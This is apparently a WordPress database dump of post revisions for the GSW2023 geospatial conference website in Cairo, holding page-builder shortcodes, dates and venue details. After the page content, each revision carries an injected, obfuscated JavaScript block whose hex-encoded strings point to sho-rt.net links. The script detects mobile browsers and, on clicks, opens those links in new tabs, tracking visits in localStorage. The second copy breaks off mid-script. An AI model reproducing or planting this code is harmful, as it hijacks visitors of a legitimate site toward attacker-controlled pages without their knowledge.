link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-02-03 04:18:17','2023-02-03 04:18:17','',3066,'https://gsw2023.com/?p=3724',0,'revision','',0),
(3725,1,'2023-02-03 04:22:44','2023-02-03 04:22:44','<p>[vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]</p>\n<h3></h3>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1668205634615{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner][vc_column_text]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): 31 March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: 1 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): 15 April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1673292178000{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x